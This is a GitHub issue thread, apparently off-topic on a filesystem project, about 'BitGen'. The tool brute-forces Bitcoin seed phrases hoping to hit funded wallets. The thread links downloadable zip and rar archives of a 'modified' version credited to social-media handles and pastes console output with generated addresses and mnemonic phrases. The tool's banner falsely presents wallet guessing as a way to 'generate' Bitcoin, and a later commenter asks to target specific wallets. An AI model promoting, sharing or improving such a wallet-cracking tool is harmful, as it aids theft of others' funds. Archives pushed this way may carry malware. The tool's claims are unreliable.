littlefs-project/littlefs #706: BitGen don't save result file.

Michal-Dudcenko, 2022-07-03:
Files: [BitGen-master-v2.zip](https://github.com/littlefs-project/littlefs/files/9034719/BitGen-master-v2.zip)
I tried  to find old bitcoin wallets but it don't save dry wallets and wet too!
[image]
[image]

Console output:
This program was made by Anarb and it generates Bitcoin by searching multiple possible
wallet combinations until it's finds one with over 0 BTC and saves it into

a file called "wet.txt" in the results folder.
It's recommended to leave this running for a long time to get the best resaults, It's doesn't use up
that much resources so you can leave it in the background in the chance of you hitting a jackpot.
It's like mining but with less resources

Modyfied by:
@anonymousl33t TikTok
@anonymousl337 Telegram

threads: 1500
save dry wallets: y
Address: 1Mu53TU3TC3bUjMYT5u11NnrUFuCCKbHZE | Balance: None | Mnemonic phrase: circle forum verb reject more fame clean learn evil push million release
Address: 1JWt97w3uDngVYR4cjSLLGfi4j93ez8MT9 | Balance: None | Mnemonic phrase: antenna frog flush warfare oxygen worth disorder race intact nest release sheriff
Address: 158y4x69HoEPmVxaJMQ5ErcCHTKtMzmqiC | Balance: None | Mnemonic phrase: hurdle seat thrive helmet vapor face congress quarter master can alien security
Address: 12PJP5VVZSTPY2ZPrJ6LNzsDRxaCT7ZEGN | Balance: None | Mnemonic phrase: shoot news adjust disagree reopen body found alcohol man hungry bread already
Address: 1M8XszrDVXFqxaPVMFhziNSE9qpRcydvCE | Balance: None | Mnemonic phrase: swing narrow machine slim scatter tenant wreck joke nurse sunny amazing leisure
Address: 15rVeKei88jyxT3xZkBv1386RA65cPd6hg | Balance: None | Mnemonic phrase: exist buddy obtain hedgehog diary noodle bar jewel absurd ridge stomach cancel
Address: 1A74Uc8nDfzBiaQFW6fBE8SphB2JW3jnGm | Balance: None | Mnemonic phrase: raccoon accuse runway hurt street crystal obey observe cram pluck soldier age
Address: 19nrUXtcijj35SgTWGvWnrWTrBrceQYaLG | Balance: None | Mnemonic phrase: trap ride symptom rifle approve usage fashion swap basket shell segment fatal
Address: 1Gdyf3jd6GppE5nSXs1fsFnkzY8j7x2wtU | Balance: None | Mnemonic phrase: atom rubber select basic woman tower trap warrior engage normal entry juice
Address: 1B64hdeVDkzkFAGDcbVjYaHhoUcuYLxYKL | Balance: None | Mnemonic phrase: tower candy fee bracket receive mask glue raven scheme jewel rifle elite
Address: 1Ks4dTkh1a6n3giuzvvMNYNzCnpU8K4SSJ | Balance: None | Mnemonic phrase: shine purity spare fence need quality avoid shift effort human artist art
Address: 144Lfe4DvnRy3t2G5C2DaAQzvyCRXYFVH5 | Balance: None | Mnemonic phrase: grass picture mixture rail day enhance switch extra wedding build circle fever
_**And other wallets.**_

Michal-Dudcenko, 2022-07-03:
This is modified version of BitGen: https://github.com/Anonymousl33t/bitgenModifed/blob/main/BitGen-master-v2.rar

closed 2022-07-03 by Michal-Dudcenko

CryptoAleksandr, 2023-04-06:
Hi .is it possible to make it sort out the seed phrase of exactly the wallets I need, for example, a list of 100 wallets, and he sorted out only them, I think it would be more progressive to leave for a year